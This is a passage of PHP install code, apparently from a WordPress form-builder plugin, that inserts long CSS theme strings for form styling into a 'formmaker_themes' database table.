width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/10/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 38px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/10/next.png) no-repeat right #6C005E;\r\npadding: 0px 36px 0 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-right-radius: 7px;\r\nborder-bottom-right-radius: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\ncolor: #A2A2A2;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 37px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/09/previous.png) no-repeat left #F1F1F1;\r\npadding: 0 20px 0 36px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-left-radius: 7px;\r\nborder-bottom-left-radius: 7px;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #6C005E;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #6C005E;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #6C005E;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	padding: 2px;\r\n	height: 26px;\r\n	border: 1px solid #B7B7B7;\r\nbackground: #F8F8F8;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\nselect {\r\n	outline: none;\r\n}\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n\r\n\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n\r\n\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #6C005E;\r\nbackground-color: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 29px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 16px;\r\nfont-weight:bold;\r\n}\r\n.page_active {\r\ncolor: #FFF;\r\ncursor: pointer;\r\nbackground-color: #6C005E;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 20px;\r\npadding: 5px 25px 0px 25px;\r\nline-height: 26px;\r\nfont-weight:bold;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 0px;\r\nborder-spacing: 0px;\r\nheight: 16px;\r\nline-height: 16px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nvertical-align: middle;\r\nbackground: #6C005E;\r\ncolor: #fff;\r\nborder-top-left-radius: 5px;\r\nborder-bottom-left-radius: 5px;\r\n}\r\n.page_percentage_deactive {\r\nheight: 16px;\r\nline-height: 16px;\r\nbackground-color: #F1F1F1;\r\ntext-align: left !important;\r\nmargin-bottom: 1px;\r\nborder-radius: 5px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\nmargin: 3px 5px 3px 9px;\r\ncolor: #FFF;\r\nfont-size: 12px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 01 black\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #000000;\r\nborder-radius: 5px;\r\ncolor: #000000;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\ninput[type="radio"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\ninput[type="checkbox"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px solid #000 !important;\r\npadding-left:10px;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n\r\n.sel-imul {\r\n	display: none;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/10/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 38px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/10/next.png) no-repeat right #000;\r\npadding: 0px 36px 0 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-right-radius: 7px;\r\nborder-bottom-right-radius: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\ncolor: #A2A2A2;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 37px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/09/previous.png) no-repeat left #F1F1F1;\r\npadding: 0 20px 0 36px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-left-radius: 7px;\r\nborder-bottom-left-radius: 7px;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #000;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #000;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #000;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	padding: 2px;\r\n	height: 26px;\r\n	border: 1px solid #B7B7B7;\r\nbackground: #F8F8F8;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\nselect {\r\n	outline: none;\r\n}\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n\r\n\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n\r\n\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #000;\r\nbackground-color: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 29px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 16px;\r\nfont-weight:bold;\r\n}\r\n.page_active {\r\ncolor: #FFF;\r\ncursor: pointer;\r\nbackground-color: #000;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 20px;\r\npadding: 5px 25px 0px 25px;\r\nline-height: 26px;\r\nfont-weight:bold;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 0px;\r\nborder-spacing: 0px;\r\nheight: 16px;\r\nline-height: 16px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nvertical-align: middle;\r\nbackground: #000;\r\ncolor: #fff;\r\nborder-top-left-radius: 5px;\r\nborder-bottom-left-radius: 5px;\r\n}\r\n.page_percentage_deactive {\r\nheight: 16px;\r\nline-height: 16px;\r\nbackground-color: #F1F1F1;\r\ntext-align: left !important;\r\nmargin-bottom: 1px;\r\nborder-radius: 5px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\nmargin: 3px 5px 3px 9px;\r\ncolor: #FFF;\r\nfont-size: 12px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 1)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 01 transparent (black button)\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #000000;\r\nborder-radius: 5px;\r\ncolor: #000000;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\ninput[type="radio"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\ninput[type="checkbox"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px solid #000 !important;\r\npadding-left:10px;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n\r\n.sel-imul {\r\n	display: none;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	